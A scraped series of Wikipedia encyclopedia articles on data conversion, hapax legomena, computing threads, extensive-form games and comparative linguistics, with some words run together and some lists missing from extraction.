Data conversionis the conversion ofcomputer datafrom oneformatto another. Throughout a computer environment, data isencodedin a variety of ways. For example,computer hardwareis built on the basis of certain standards, which requires that data contains, for example,parity bitchecks. Similarly, theoperating systemis predicated on certain standards for data and file handling. Furthermore, each computer program handles data in a different manner. Whenever any one of these variables is changed, data must be converted in some way before it can be used by a different computer, operating system or program. Even different versions of these elements usually involve different data structures. For example, the changing ofbitsfrom one format to another, usually for the purpose of application interoperability or of the capability of using new features, is merely a data conversion. Data conversions may be as simple as the conversion of atext filefrom onecharacter encodingsystem to another; or more complex, such as the conversion of office file formats, or theconversion of image formatsandaudio file formats.
There are many ways in which data is converted within the computer environment. This may be seamless, as in the case of upgrading to a newer version of a computer program. Alternatively, the conversion may require processing by the use of a special conversion program, or it may involve a complex process of going through intermediary stages, or involving complex "exporting" and "importing" procedures, which may include converting to and from a tab-delimited or comma-separated text file. In some cases, a program may recognize several data file formats at the data input stage and then is also capable of storing the output data in several different formats. Such a program may be used to convert a file format. If the source format or target format is not recognized, then at times a third program may be available which permits the conversion to an intermediate format, which can then be reformatted using the first program. There are many possible scenarios.
Before any data conversion is carried out, the user or application programmer should keep a few basics of computing andinformation theoryin mind. These include:
For example, atrue colorimage can easily be converted to grayscale, while the opposite conversion is a painstaking process. Converting aUnixtext file to aMicrosoft(DOS/Windows) text file involves adding characters, but this does not increase theentropysince it is rule-based; whereas the addition of color information to a grayscale image cannot be reliably done programmatically, as it requires adding new information, so any attempt to add color would requireestimationby the computer based on previous knowledge. Converting a 24-bitPNGto a 48-bit one does not add information to it, it only pads existingRGBpixel values with zeroes[citation needed], so that a pixel with a value of FF C3 56, for example, becomes FF00 C300 5600. The conversion makes it possible to change a pixel to have a value of, for instance, FF80 C340 56A0, but the conversion itself does not do that, only further manipulation of the image can. Converting an image or audio file in alossyformat (likeJPEGorVorbis) to alossless(likePNGorFLAC) or uncompressed (likeBMPorWAV) format only wastes space, since the same image with its loss of original information (the artifacts of lossy compression) becomes the target. A JPEG image can never be restored to the quality of the original image from which it was made, no matter how much the user tries the "JPEG ArtifactRemoval" feature of his or her image manipulation program.
Automatic restoration of information that was lost through alossy compressionprocess would probably require important advances inartificial intelligence.
Because of these realities of computing and information theory, data conversion is often a complex and error-prone process that requires the help of experts.
Data conversion can occur directly from one format to another, but many applications that convert between multiple formats use anintermediate representationby way of which any source format is converted to its target.[1]For example, it is possible to convertCyrillictext fromKOI8-RtoWindows-1251using a lookup table between the two encodings, but the modern approach is to convert the KOI8-R file toUnicodefirst and from that to Windows-1251. This is a more manageable approach; rather than needing lookup tables for all possible pairs of character encodings, an application needs only one lookup table for each character set, which it uses to convert to and from Unicode, thereby scaling the number of tables down from hundreds to a few tens.[citation needed]
Pivotal conversion is similarly used in other areas. Office applications, when employed to convert between office file formats, use their internal, default file format as a pivot. For example, aword processormay convert anRTFfile to aWordPerfectfile by converting the RTF toOpenDocumentand then that to WordPerfect format. An image conversion program does not convert aPCXimage toPNGdirectly; instead, when loading the PCX image, it decodes it to a simple bitmap format for internal use in memory, and when commanded to convert to PNG, that memory image is converted to the target format. An audio converter that converts fromFLACtoAACdecodes the source file to rawPCMdata in memory first, and then performs the lossy AAC compression on that memory image to produce the target file.
The objective of data conversion is to maintain all of the data, and as much of the embedded information as possible. This can only be done if the target format supports the same features and data structures present in the source file. Conversion of a word processing document to a plain text file necessarily involves loss of formatting information, because plain text format does not support word processing constructs such as marking a word as boldface. For this reason, conversion from one format to another which does not support a feature that is important to the user is rarely carried out, though it may be necessary for interoperability, e.g. converting a file from one version ofMicrosoft Wordto an earlier version to enable transfer and use by other users who do not have the same later version of Word installed on their computer.
Loss of information can be mitigated by approximation in the target format. There is no way of converting a character likeätoASCII, since the ASCII standard lacks it, but the information may be retained by approximating the character asae. Of course, this is not an optimal solution, and can impact operations like searching and copying; and if a language makes a distinction betweenäandae, then that approximation does involve loss of information.
Data conversion can also suffer from inexactitude, the result of converting between formats that are conceptually different. TheWYSIWYGparadigm, extant in word processors anddesktop publishingapplications, versus the structural-descriptive paradigm, found inSGML,XMLand many applications derived therefrom, likeHTMLandMathML, is one example. Using a WYSIWYG HTML editor conflates the two paradigms, and the result is HTML files with suboptimal, if not nonstandard, code. In the WYSIWYG paradigm a double linebreak signifies a new paragraph, as that is the visual cue for such a construct, but a WYSIWYG HTML editor will usually convert such a sequence to <BR><BR>, which is structurally no new paragraph at all. As another example, converting fromPDFto an editable word processor format is a tough chore, because PDF records the textual information like engraving on stone, with each character given a fixed position and linebreaks hard-coded, whereas word processor formats accommodate text reflow. PDF does not know of a word space character—the space between two letters and the space between two words differ only in quantity. Therefore, a title with ample letter-spacing for effect will usually end up with spaces in the word processor file, for example INTRODUCTION with spacing of 1emas I N T R O D U C T I O N on the word processor.
Successful data conversion requires thorough knowledge of the workings of both source and target formats. In the case where the specification of a format is unknown,reverse engineeringwill be needed to carry out conversion. Reverse engineering can achieve close approximation of the original specifications, but errors and missing features can still result.
Data format conversion can also occur at the physical layer of an electronic communication system. Conversion betweenline codessuch asNRZandRZcan be accomplished when necessary.
Manolescu, FirstName (2006).Pattern Languages of Program Design 5. Upper Saddle River, NJ: Addison-Wesley.ISBN0321321944.
|
https://en.wikipedia.org/wiki/Data_conversion
|
Incorpus linguistics, ahapax legomenon(/ˈhæpəkslɪˈɡɒmɪnɒn/also/ˈhæpæks/or/ˈheɪpæks/;[1][2]pl.hapax legomena; sometimes abbreviated tohapax, pluralhapaxes) is awordor anexpressionthat occurs only once within a context: either in the written record of an entirelanguage, in the works of an author, or in a single text. The term is sometimes incorrectly used to describe a word that occurs in just one of an author's works but more than once in that particular work.Hapax legomenonis atransliterationofGreekἅπαξ λεγόμενον, meaning "said once".[3]
The related termsdis legomenon,tris legomenon, andtetrakis legomenonrespectively (/ˈdɪs/,/ˈtrɪs/,/ˈtɛtrəkɪs/) refer to double, triple, or quadruple occurrences, but are far less commonly used.
Hapax legomenaare quite common, as predicted byZipf's law,[4]which states that the frequency of any word in acorpusis inversely proportional to its rank in the frequency table. For large corpora, about 40% to 60% of the words arehapax legomena, and another 10% to 15% aredis legomena.[5]Thus, in theBrown Corpusof American English, about half of the 50,000 distinct words arehapax legomenawithin that corpus.[6]
Hapax legomenonrefers to the appearance of a word or an expression in a body of text, not to either its origin or its prevalence in speech. It thus differs from anonce word, which may never be recorded, may find currency and may be widely recorded, or may appear several times in the work whichcoinsit, and so on.
Hapax legomenain ancient texts are usually difficult to decipher, since it is easier to infer meaning from multiple contexts than from just one. For example, many of the remaining undecipheredMayan glyphsarehapax legomena, and Biblical (particularlyHebrew; see§ Hebrew)hapax legomenasometimes pose problems in translation.Hapax legomenaalso pose challenges innatural language processing.[7]
Some scholars considerHapax legomenauseful in determining the authorship of written works.P. N. Harrison, inThe Problem of the Pastoral Epistles(1921)[8]madehapax legomenapopular amongBible scholars, when he argued that there are considerably more of them in the threePastoral Epistlesthan in otherPauline Epistles. He argued that the number ofhapax legomenain a putative author's corpus indicates his or her vocabulary and is characteristic of the author as an individual.
Harrison's theory has faded in significance due to a number of problems raised by other scholars. For example, in 1896,W. P. Workmanfound the following numbers ofhapax legomenain eachPauline Epistle:
At first glance, the last three totals (for the Pastoral Epistles) are not out of line with the others.[9]To take account of the varying length of the epistles, Workman also calculated the average number ofhapax legomenaper page of theGreek text, which ranged from 3.6 to 13, as summarized in the diagram on the right.[9]Although the Pastoral Epistles have morehapax legomenaper page, Workman found the differences to be moderate in comparison to the variation among other Epistles. This was reinforced when Workman looked at severalplaysbyShakespeare, which showed similar variations (from 3.4 to 10.4 per page of Irving's one-volume edition), as summarized in the second diagram on the right.[9]
Apart from author identity, there are several other factors that can explain the number ofhapax legomenain a work:[10]
In the particular case of the Pastoral Epistles, all of these variables are quite different from those in the rest of the Pauline corpus, andhapax legomenaare no longer widely accepted as strong indicators of authorship; those who reject Pauline authorship of the Pastorals rely on other arguments.[11]
There are also subjective questions over whether two forms amount to "the same word": dog vs. dogs, clue vs. clueless, sign vs. signature; many other gray cases also arise. TheJewish Encyclopediapoints out that, although there are 1,500hapaxesin theHebrew Bible, only about 400 are not obviously related to other attested word forms.[12]
A final difficulty with the use ofhapax legomenafor authorship determination is that there is considerable variation among works known to be by a single author, and disparate authors often show similar values. In other words,hapax legomenaare not a reliable indicator. Authorship studies now usually use a wide range of measures to look for patterns rather than relying upon single measurements.
In the fields ofcomputational linguisticsandnatural language processing(NLP), esp.corpus linguisticsandmachine-learnedNLP, it is common to disregardhapax legomena(and sometimes other infrequent words), as they are likely to have little value for computational techniques. This disregard has the added benefit of significantly reducing the memory use of an application, since, byZipf's law, many words are hapax legomena.[13]
The following are some examples ofhapax legomenain languages orcorpora.
In theQurʾān:
Classical Chinese and Japanese literature contains manyChinese charactersthat feature only once in the corpus, and their meaning and pronunciation has often been lost. Known in Japanese askogo(孤語), literally "lonely characters", these can be considered a type ofhapax legomenon.[15]For example, theClassic of Poetry(c.1000 BC) uses the character篪exactly once in the verse「伯氏吹塤, 仲氏吹篪」, and it was only through the discovery of a description byGuo Pu(276–324 AD) that the character could be associated with a specific type of ancient flute.
It is fairly common for authors to "coin" new words to convey a particular meaning or for the sake of entertainment, without any suggestion that they are "proper" words. For example,P.G. WodehouseandLewis Carrollfrequently coined novel words.Indexy, below, appears to be an example of this.
According to classical scholarClyde Pharr, "theIliadhas 1097hapax legomena, while theOdysseyhas 868".[19]Others have defined the term differently, however, and count as few as 303 in theIliadand 191 in theOdyssey.[20]
The number of distincthapax legomenain theHebrew Bibleis 1,480 (out of a total of 8,679 distinct words used).[26]: 112However, due to Hebrewroots,suffixesandprefixes, only 400 are "true"hapax legomena.[12]A full list can be seen at theJewish Encyclopediaentry for "Hapax Legomena".[12]
Some examples include:
|
https://en.wikipedia.org/wiki/Hapax_legomenon
|
Incomputer science, athreadofexecutionis the smallest sequence of programmed instructions that can be managed independently by ascheduler, which is typically a part of theoperating system.[1]In many cases, a thread is a component of aprocess.
The multiple threads of a given process may be executedconcurrently(via multithreading capabilities), sharing resources such asmemory, while different processes do not share these resources. In particular, the threads of a process share its executable code and the values of itsdynamically allocatedvariables and non-thread-localglobal variablesat any given time.
The implementation of threads andprocessesdiffers between operating systems.[2][page needed]
Threads made an early appearance under the name of "tasks" in IBM's batch processing operating system, OS/360, in 1967. It provided users with three available configurations of theOS/360control system, of whichMultiprogramming with a Variable Number of Tasks(MVT) was one. Saltzer (1966) creditsVictor A. Vyssotskywith the term "thread".[3]
The use of threads in software applications became more common in the early 2000s as CPUs began to utilize multiple cores. Applications wishing to take advantage of multiple cores for performance advantages were required to employ concurrency to utilize the multiple cores.[4]
Scheduling can be done at the kernel level or user level, and multitasking can be donepreemptivelyorcooperatively. This yields a variety of related concepts.
At the kernel level, aprocesscontains one or morekernel threads, which share the process's resources, such as memory and file handles – a process is a unit of resources, while a thread is a unit of scheduling and execution. Kernel scheduling is typically uniformly done preemptively or, less commonly, cooperatively. At the user level a process such as aruntime systemcan itself schedule multiple threads of execution. If these do not share data, as in Erlang, they are usually analogously called processes,[5]while if they share data they are usually called(user) threads, particularly if preemptively scheduled. Cooperatively scheduled user threads are known asfibers; different processes may schedule user threads differently. User threads may be executed by kernel threads in various ways (one-to-one, many-to-one, many-to-many). The term "light-weight process" variously refers to user threads or to kernel mechanisms for scheduling user threads onto kernel threads.
Aprocessis a "heavyweight" unit of kernel scheduling, as creating, destroying, and switching processes is relatively expensive. Processes ownresourcesallocated by the operating system. Resources include memory (for both code and data),file handles, sockets, device handles, windows, and aprocess control block. Processes areisolatedbyprocess isolation, and do not share address spaces or file resources except through explicit methods such as inheriting file handles or shared memory segments, or mapping the same file in a shared way – seeinterprocess communication. Creating or destroying a process is relatively expensive, as resources must be acquired or released. Processes are typically preemptively multitasked, and process switching is relatively expensive, beyond basic cost ofcontext switching, due to issues such as cache flushing (in particular, process switching changes virtual memory addressing, causing invalidation and thus flushing of an untaggedtranslation lookaside buffer(TLB), notably on x86).
Akernel threadis a "lightweight" unit of kernel scheduling. At least one kernel thread exists within each process. If multiple kernel threads exist within a process, then they share the same memory and file resources. Kernel threads are preemptively multitasked if the operating system's processscheduleris preemptive. Kernel threads do not own resources except for astack, a copy of theregistersincluding theprogram counter, andthread-local storage(if any), and are thus relatively cheap to create and destroy. Thread switching is also relatively cheap: it requires a context switch (saving and restoring registers and stack pointer), but does not change virtual memory and is thus cache-friendly (leaving TLB valid). The kernel can assign one or more software threads to each core in a CPU (it being able to assign itself multiple software threads depending on its support for multithreading), and can swap out threads that get blocked. However, kernel threads take much longer than user threads to be swapped.
Threads are sometimes implemented inuserspacelibraries, thus calleduser threads. The kernel is unaware of them, so they are managed and scheduled in userspace. Some implementations base their user threads on top of several kernel threads, to benefit frommulti-processormachines (M:N model). User threads as implemented byvirtual machinesare also calledgreen threads.
As user thread implementations are typically entirely in userspace, context switching between user threads within the same process is extremely efficient because it does not require any interaction with the kernel at all: a context switch can be performed by locally saving the CPU registers used by the currently executing user thread or fiber and then loading the registers required by the user thread or fiber to be executed. Since scheduling occurs in userspace, the scheduling policy can be more easily tailored to the requirements of the program's workload.
However, the use of blocking system calls in user threads (as opposed to kernel threads) can be problematic. If a user thread or a fiber performs a system call that blocks, the other user threads and fibers in the process are unable to run until the system call returns. A typical example of this problem is when performing I/O: most programs are written to perform I/O synchronously. When an I/O operation is initiated, a system call is made, and does not return until the I/O operation has been completed. In the intervening period, the entire process is "blocked" by the kernel and cannot run, which starves other user threads and fibers in the same process from executing.
A common solution to this problem (used, in particular, by many green threads implementations) is providing an I/O API that implements an interface that blocks the calling thread, rather than the entire process, by using non-blocking I/O internally, and scheduling another user thread or fiber while the I/O operation is in progress. Similar solutions can be provided for other blocking system calls. Alternatively, the program can be written to avoid the use of synchronous I/O or other blocking system calls (in particular, using non-blocking I/O, including lambda continuations and/or async/awaitprimitives[6]).
Fibersare an even lighter unit of scheduling which arecooperatively scheduled: a running fiber must explicitly "yield" to allow another fiber to run, which makes their implementation much easier than kernel oruser threads. A fiber can be scheduled to run in any thread in the same process. This permits applications to gain performance improvements by managing scheduling themselves, instead of relying on the kernel scheduler (which may not be tuned for the application). Some research implementations of theOpenMPparallel programming model implement their tasks through fibers.[7][8]Closely related to fibers arecoroutines, with the distinction being that coroutines are a language-level construct, while fibers are a system-level construct.
Threads differ from traditionalmultitaskingoperating-systemprocessesin several ways:
Systems such asWindows NTandOS/2are said to havecheapthreads andexpensiveprocesses; in other operating systems there is not so great a difference except in the cost of anaddress-spaceswitch, which on some architectures (notablyx86) results in atranslation lookaside buffer(TLB) flush.
Advantages and disadvantages of threads vs processes include:
Operating systems schedule threads eitherpreemptivelyorcooperatively.Multi-user operating systemsgenerally favorpreemptive multithreadingfor its finer-grained control over execution time viacontext switching. However, preemptive scheduling may context-switch threads at moments unanticipated by programmers, thus causinglock convoy,priority inversion, or other side-effects. In contrast,cooperative multithreadingrelies on threads to relinquish control of execution, thus ensuring that threadsrun to completion. This can cause problems if a cooperatively multitasked threadblocksby waiting on aresourceor if itstarvesother threads by not yielding control of execution during intensive computation.
Until the early 2000s, most desktop computers had only one single-core CPU, with no support forhardware threads, although threads were still used on such computers because switching between threads was generally still quicker than full-processcontext switches. In 2002,Inteladded support forsimultaneous multithreadingto thePentium 4processor, under the namehyper-threading; in 2005, they introduced the dual-corePentium Dprocessor andAMDintroduced the dual-coreAthlon 64 X2processor.
Systems with a single processor generally implement multithreading bytime slicing: thecentral processing unit(CPU) switches between differentsoftware threads. Thiscontext switchingusually occurs frequently enough that users perceive the threads or tasks as running in parallel (for popular server/desktop operating systems, maximum time slice of a thread, when other threads are waiting, is often limited to 100–200ms). On amultiprocessorormulti-coresystem, multiple threads can execute inparallel, with every processor or core executing a separate thread simultaneously; on a processor or core withhardware threads, separate software threads can also be executed concurrently by separate hardware threads.
Threads created by the user in a 1:1 correspondence with schedulable entities in the kernel[9]are the simplest possible threading implementation.OS/2andWin32used this approach from the start, while onLinuxtheGNU C Libraryimplements this approach (via theNPTLor olderLinuxThreads). This approach is also used bySolaris,NetBSD,FreeBSD,macOS, andiOS.
AnM:1 model implies that all application-level threads map to one kernel-level scheduled entity;[9]the kernel has no knowledge of the application threads. With this approach, context switching can be done very quickly and, in addition, it can be implemented even on simple kernels which do not support threading. One of the major drawbacks, however, is that it cannot benefit from the hardware acceleration onmultithreadedprocessors ormulti-processorcomputers: there is never more than one thread being scheduled at the same time.[9]For example: If one of the threads needs to execute an I/O request, the whole process is blocked and the threading advantage cannot be used. TheGNU Portable Threadsuses User-level threading, as doesState Threads.
M:Nmaps someMnumber of application threads onto someNnumber of kernel entities,[9]or "virtual processors." This is a compromise between kernel-level ("1:1") and user-level ("N:1") threading. In general, "M:N" threading systems are more complex to implement than either kernel or user threads, because changes to both kernel and user-space code are required[clarification needed]. In the M:N implementation, the threading library is responsible for scheduling user threads on the available schedulable entities; this makes context switching of threads very fast, as it avoids system calls. However, this increases complexity and the likelihood ofpriority inversion, as well as suboptimal scheduling without extensive (and expensive) coordination between the userland scheduler and the kernel scheduler.
SunOS4.x implementedlight-weight processesor LWPs.NetBSD2.x+, andDragonFly BSDimplement LWPs as kernel threads (1:1 model). SunOS 5.2 through SunOS 5.8 as well as NetBSD 2 to NetBSD 4 implemented a two level model, multiplexing one or more user level threads on each kernel thread (M:N model). SunOS 5.9 and later, as well as NetBSD 5 eliminated user threads support, returning to a 1:1 model.[10]FreeBSD 5 implemented M:N model. FreeBSD 6 supported both 1:1 and M:N, users could choose which one should be used with a given program using /etc/libmap.conf. Starting with FreeBSD 7, the 1:1 became the default. FreeBSD 8 no longer supports the M:N model.
Incomputer programming,single-threadingis the processing of oneinstructionat a time.[11]In the formal analysis of the variables'semanticsand process state, the termsingle threadingcan be used differently to mean "backtracking within a single thread", which is common in thefunctional programmingcommunity.[12]
Multithreading is mainly found in multitasking operating systems. Multithreading is a widespread programming and execution model that allows multiple threads to exist within the context of one process. These threads share the process's resources, but are able to execute independently. The threaded programming model provides developers with a useful abstraction of concurrent execution. Multithreading can also be applied to one process to enableparallel executionon amultiprocessingsystem.
Multithreading libraries tend to provide a function call to create a new thread, which takes a function as a parameter. A concurrent thread is then created which starts running the passed function and ends when the function returns. The thread libraries also offer data synchronization functions.
Threads in the same process share the same address space. This allows concurrently running code tocoupletightly and conveniently exchange data without the overhead or complexity of anIPC. When shared between threads, however, even simple data structures become prone torace conditionsif they require more than one CPU instruction to update: two threads may end up attempting to update the data structure at the same time and find it unexpectedly changing underfoot. Bugs caused by race conditions can be very difficult to reproduce and isolate.
To prevent this, threadingapplication programming interfaces(APIs) offersynchronization primitivessuch asmutexestolockdata structures against concurrent access. On uniprocessor systems, a thread running into a locked mutex must sleep and hence trigger a context switch. On multi-processor systems, the thread may instead poll the mutex in aspinlock. Both of these may sap performance and force processors insymmetric multiprocessing(SMP) systems to contend for the memory bus, especially if thegranularityof the locking is too fine.
Other synchronization APIs includecondition variables,critical sections,semaphores, andmonitors.
A popular programming pattern involving threads is that ofthread poolswhere a set number of threads are created at startup that then wait for a task to be assigned. When a new task arrives, it wakes up, completes the task and goes back to waiting. This avoids the relatively expensive thread creation and destruction functions for every task performed and takes thread management out of the application developer's hand and leaves it to a library or the operating system that is better suited to optimize thread management.
Multithreaded applications have the following advantages vs single-threaded ones:
Multithreaded applications have the following drawbacks:
Many programming languages support threading in some capacity.
|
https://en.wikipedia.org/wiki/Thread_(computing)
|
Ingame theory, anextensive-form gameis a specification of agameallowing for the explicit representation of a number of key aspects, like the sequencing of players' possible moves, theirchoices at every decision point, the (possiblyimperfect) information each player has about the other player's moves when they make a decision, and their payoffs for all possible game outcomes. Extensive-form games also allow for the representation ofincomplete informationin the form of chance events modeled as "moves by nature". Extensive-form representations differ fromnormal-formin that they provide a more complete description of the game in question, whereas normal-form simply boils down the game into a payoff matrix.
Some authors, particularly in introductory textbooks, initially define the extensive-form game as being just agame treewith payoffs (no imperfect or incomplete information), and add the other elements in subsequent chapters as refinements. Whereas the rest of this article follows this gentle approach with motivating examples, we present upfront the finite extensive-form games as (ultimately) constructed here. This general definition was introduced byHarold W. Kuhnin 1953, who extended an earlier definition ofvon Neumannfrom 1928. Following the presentation fromHart (1992), ann-player extensive-form game thus consists of the following:
A play is thus a path through the tree from the root to a terminal node. At any given non-terminal node belonging to Chance, an outgoing branch is chosen according to the probability distribution. At any rational player's node, the player must choose one of the equivalence classes for the edges, which determines precisely one outgoing edge except (in general) the player doesn't know which one is being followed. (An outside observer knowing every other player's choices up to that point, and therealizationof Nature's moves, can determine the edge precisely.) Apure strategyfor a player thus consists of aselection—choosing precisely one class of outgoing edges for every information set (of his). In a game of perfect information, the information sets aresingletons. It's less evident how payoffs should be interpreted in games with Chance nodes. It is assumed that each player has avon Neumann–Morgenstern utility functiondefined for every game outcome; this assumption entails that every rational player will evaluate ana priorirandom outcome by itsexpectedutility.
The above presentation, while precisely defining the mathematical structure over which the game is played, elides however the more technical discussion of formalizing statements about how the game is played like "a player cannot distinguish between nodes in the same information set when making a decision". These can be made precise usingepistemic modal logic; seeShoham & Leyton-Brown (2009, chpt. 13) for details.
Aperfect informationtwo-player game over agame tree(as defined incombinatorial game theoryandartificial intelligence) can be represented as an extensive form game with outcomes (i.e. win, lose, ordraw). Examples of such games includetic-tac-toe,chess, andinfinite chess.[1][2]A game over anexpectminimax tree, like that ofbackgammon, has no imperfect information (all information sets are singletons) but has moves of chance. For example,pokerhas both moves of chance (the cards being dealt) and imperfect information (the cards secretly held by other players). (Binmore 2007, chpt. 2)
A complete extensive-form representation specifies:
The game on the right has two players: 1 and 2. The numbers by every non-terminal node indicate to which player that decision node belongs. The numbers by every terminal node represent the payoffs to the players (e.g. 2,1 represents a payoff of 2 to player 1 and a payoff of 1 to player 2). The labels by every edge of the graph are the name of the action that edge represents.
The initial node belongs to player 1, indicating that player 1 moves first. Play according to the tree is as follows: player 1 chooses betweenUandD; player 2 observes player 1's choice and then chooses betweenU'andD'. The payoffs are as specified in the tree. There are four outcomes represented by the four terminal nodes of the tree: (U,U'), (U,D'), (D,U') and (D,D'). The payoffs associated with each outcome respectively are as follows (0,0), (2,1), (1,2) and (3,1).
If player 1 playsD, player 2 will playU'to maximise their payoff and so player 1 will only receive 1. However, if player 1 playsU, player 2 maximises their payoff by playingD'and player 1 receives 2. Player 1 prefers 2 to 1 and so will playUand player 2 will playD'. This is thesubgame perfect equilibrium.
An advantage of representing the game in this way is that it is clear what the order of play is. The tree shows clearly that player 1 moves first and player 2 observes this move. However, in some games play does not occur like this. One player does not always observe the choice of another (for example, moves may be simultaneous or a move may be hidden). Aninformation setis a set of decision nodes such that:
In extensive form, an information set is indicated by a dotted line connecting all nodes in that set or sometimes by a loop drawn around all the nodes in that set.
If a game has an information set with more than one member that game is said to haveimperfect information. A game withperfect informationis such that at any stage of the game, every player knows exactly what has taken place earlier in the game; i.e. every information set is asingletonset.[1][2]Any game without perfect information has imperfect information.
The game on the right is the same as the above game except that player 2 does not know what player 1 does when they come to play. The first game described has perfect information; the game on the right does not. If both players are rational and both know that both players are rational and everything that is known by any player is known to be known by every player (i.e. player 1 knows player 2 knows that player 1 is rational and player 2 knows this, etc.ad infinitum), play in the first game will be as follows: player 1 knows that if they playU, player 2 will playD'(because for player 2 a payoff of 1 is preferable to a payoff of 0) and so player 1 will receive 2. However, if player 1 playsD, player 2 will playU'(because to player 2 a payoff of 2 is better than a payoff of 1) and player 1 will receive 1. Hence, in the first game, the equilibrium will be (U,D') because player 1 prefers to receive 2 to 1 and so will playUand so player 2 will playD'.
In the second game it is less clear: player 2 cannot observe player 1's move. Player 1 would like to fool player 2 into thinking they have playedUwhen they have actually playedDso that player 2 will playD'and player 1 will receive 3. In fact in the second game there is aperfect Bayesian equilibriumwhere player 1 playsDand player 2 playsU'and player 2 holds the belief that player 1 will definitely playD. In this equilibrium, every strategy is rational given the beliefs held and every belief is consistent with the strategies played. Notice how the imperfection of information changes the outcome of the game.
To more easily solve this game for theNash equilibrium,[3]it can be converted to thenormal form.[4]Given this is asimultaneous/sequentialgame, player one and player two each have twostrategies.[5]
We will have a two by two matrix with a unique payoff for each combination of moves. Using the normal form game, it is now possible to solve the game and identify dominant strategies for both players.
These preferences can be marked within the matrix, and any box where both players have a preference provides a nash equilibrium. This particular game has a single solution of (D,U’) with a payoff of (1,2).
In games with infinite action spaces and imperfect information, non-singleton information sets are represented, if necessary, by inserting a dotted line connecting the (non-nodal) endpoints behind the arc described above or by dashing the arc itself. In theStackelberg competitiondescribed above, if the second player had not observed the first player's move the game would no longer fit the Stackelberg model; it would beCournot competition.
It may be the case that a player does not know exactly what the payoffs of the game are or of whattypetheir opponents are. This sort of game hasincomplete information. In extensive form it is represented as a game with complete but imperfect information using the so-calledHarsanyitransformation. This transformation introduces to the game the notion ofnature's choiceorGod's choice. Consider a game consisting of an employer considering whether to hire a job applicant. The job applicant's ability might be one of two things: high or low. Their ability level is random; they either have low ability with probability 1/3 or high ability with probability 2/3. In this case, it is convenient to model nature as another player of sorts who chooses the applicant's ability according to those probabilities. Nature however does not have any payoffs. Nature's choice is represented in the game tree by a non-filled node. Edges coming from a nature's choice node are labelled with the probability of the event it represents occurring.
The game on the left is one of complete information (all the players and payoffs are known to everyone) but of imperfect information (the employer doesn't know what nature's move was.) The initial node is in the centre and it is not filled, so nature moves first. Nature selects with the same probability the type of player 1 (which in this game is tantamount to selecting the payoffs in the subgame played), either t1 or t2. Player 1 has distinct information sets for these; i.e. player 1 knows what type they are (this need not be the case). However, player 2 does not observe nature's choice. They do not know the type of player 1; however, in this game they do observe player 1's actions; i.e. there is perfect information. Indeed, it is now appropriate to alter the above definition of complete information: at every stage in the game, every player knows what has been playedby the other players. In the case of private information, every player knows what has been played by nature. Information sets are represented as before by broken lines.
In this game, if nature selects t1 as player 1's type, the game played will be like the very first game described, except that player 2 does not know it (and the very fact that this cuts through their information sets disqualify it fromsubgamestatus). There is oneseparatingperfect Bayesian equilibrium; i.e. an equilibrium in which different types do different things.
If both types play the same action (pooling), an equilibrium cannot be sustained. If both playD, player 2 can only form the belief that they are on either node in the information set with probability 1/2 (because this is the chance of seeing either type). Player 2 maximises their payoff by playingD'. However, if they playD', type 2 would prefer to playU. This cannot be an equilibrium. If both types playU, player 2 again forms the belief that they are at either node with probability 1/2. In this case player 2 playsD', but then type 1 prefers to playD.
If type 1 playsUand type 2 playsD, player 2 will playD'whatever action they observe, but then type 1 prefersD. The only equilibrium hence is with type 1 playingD, type 2 playingUand player 2 playingU'if they observeDand randomising if they observeU. Through their actions, player 1 hassignalledtheir type to player 2.
Formally, a finite game in extensive form is a structureΓ=⟨K,H,[(Hi)i∈I],{A(H)}H∈H,a,ρ,u⟩{\displaystyle \Gamma =\langle {\mathcal {K}},\mathbf {H} ,[(\mathbf {H} _{i})_{i\in {\mathcal {I}}}],\{A(H)\}_{H\in \mathbf {H} },a,\rho ,u\rangle }where:
∀H∈H,∀v∈H{\displaystyle \forall H\in \mathbf {H} ,\forall v\in H}, the restrictionav:s(v)→A(H){\displaystyle a_{v}:s(v)\rightarrow A(H)}ofa{\displaystyle a}ons(v){\displaystyle s(v)}is a bijection, withs(v){\displaystyle s(v)}the set of successor nodes ofv{\displaystyle v}.
It may be that a player has an infinite number of possible actions to choose from at a particular decision node. The device used to represent this is an arc joining two edges protruding from the decision node in question. If the action space is a continuum between two numbers, the lower and upper delimiting numbers are placed at the bottom and top of the arc respectively, usually with a variable that is used to express the payoffs. The infinite number of decision nodes that could result are represented by a single node placed in the centre of the arc. A similar device is used to represent action spaces that, whilst not infinite, are large enough to prove impractical to represent with an edge for each action.
The tree on the left represents such a game, either with infinite action spaces (anyreal numberbetween 0 and 5000) or with very large action spaces (perhaps anyintegerbetween 0 and 5000). This would be specified elsewhere. Here, it will be supposed that it is the former and, for concreteness, it will be supposed it represents two firms engaged inStackelberg competition. The payoffs to the firms are represented on the left, withq1{\displaystyle q_{1}}andq2{\displaystyle q_{2}}as the strategy they adopt andc1{\displaystyle c_{1}}andc2{\displaystyle c_{2}}as some constants (here marginal costs to each firm). Thesubgame perfect Nash equilibriaof this game can be found by taking thefirst partial derivative[citation needed]of each payoff function with respect to the follower's (firm 2) strategy variable (q2{\displaystyle q_{2}}) and finding itsbest responsefunction,q2(q1)=5000−q1−c22{\displaystyle q_{2}(q_{1})={\tfrac {5000-q_{1}-c_{2}}{2}}}. The same process can be done for the leader except that in calculating its profit, it knows that firm 2 will play the above response and so this can be substituted into its maximisation problem. It can then solve forq1{\displaystyle q_{1}}by taking the first derivative, yieldingq1∗=5000+c2−2c12{\displaystyle q_{1}^{*}={\tfrac {5000+c_{2}-2c_{1}}{2}}}. Feeding this into firm 2's best response function,q2∗=5000+2c1−3c24{\displaystyle q_{2}^{*}={\tfrac {5000+2c_{1}-3c_{2}}{4}}}and(q1∗,q2∗){\displaystyle (q_{1}^{*},q_{2}^{*})}is the subgame perfect Nash equilibrium.
Historical papers
|
https://en.wikipedia.org/wiki/Extensive-form_game
|
Comparative linguisticsis a branch ofhistorical linguisticsthat is concerned with comparing languages to establish theirhistoricalrelatedness.
Genetic relatednessimplies a common origin orproto-languageand comparative linguistics aims to constructlanguage families, to reconstruct proto-languages and specify the changes that have resulted in the documented languages. To maintain a clear distinction between attested and reconstructed forms, comparative linguists prefix an asterisk to any form that is not found in surviving texts. A number of methods for carrying out language classification have been developed, ranging from simple inspection to computerised hypothesis testing. Such methods have gone through a long process of development.
